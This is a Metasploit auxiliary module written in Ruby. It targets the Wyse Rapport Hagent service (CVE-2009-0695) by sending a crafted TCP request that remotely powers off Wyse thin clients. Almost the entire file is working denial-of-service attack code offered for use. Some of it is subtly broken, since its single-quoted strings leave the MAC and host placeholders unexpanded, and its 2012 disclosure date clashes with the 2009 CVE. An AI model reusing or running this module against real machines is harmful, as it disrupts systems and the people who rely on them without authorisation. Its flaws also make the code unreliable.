require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Wyse Machine Remote Power off (DOS)', 'Description' => %q{ This module exploits the Wyse Rapport Hagent service and cause remote power cycle (Power off the wyse machine remotely). }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Author' => 'it.solunium@gmail.com', 'Version' => '$Revision: 14976 $', 'References' => [ ['CVE', '2009-0695'], ['OSVDB', '55839'], ['US-CERT-VU', '654545'], ['URL', 'http://snosoft.blogspot.com/'], ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'], ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Targets' => [ [ 'Wyse Linux x86', {'Platform' => 'linux',}], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 13 2012' )) register_options( [ Opt::RPORT(80), ], self.class) end def run # Connect to the target service print_status("Connecting to the target #{rhost}:#{rport}") if connect print_status("Connected...") end # Parameters genmac = "00"+Rex::Text.rand_text(5).unpack("H*")[0] craft_req = '&V52&CI=3|' craft_req << 'MAC=#{genmac}|#{rhost}|' craft_req << 'RB=0|MT=3|' craft_req << '|HS=#{rhost}|PO=#{rport}|' craft_req << 'SPO=0|' # Send the malicious request sock.put(craft_req) # Download some response data resp = sock.get_once(-1, 10) print_status("Received: #{resp}") disconnect if not resp print_error("No reply from the target, this may not be a vulnerable system") return end if resp == '&00' print_status("#{rhost} execute command succefuly & power off.") return end #Exeptions rescue ::Rex::ConnectionRefused print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.") rescue ::Rex::HostUnreachable print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable") rescue ::Rex::ConnectionTimeout print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out") rescue ::Errno::ECONNRESET, ::Timeout::Error print_status("#{rhost} not responding.") end end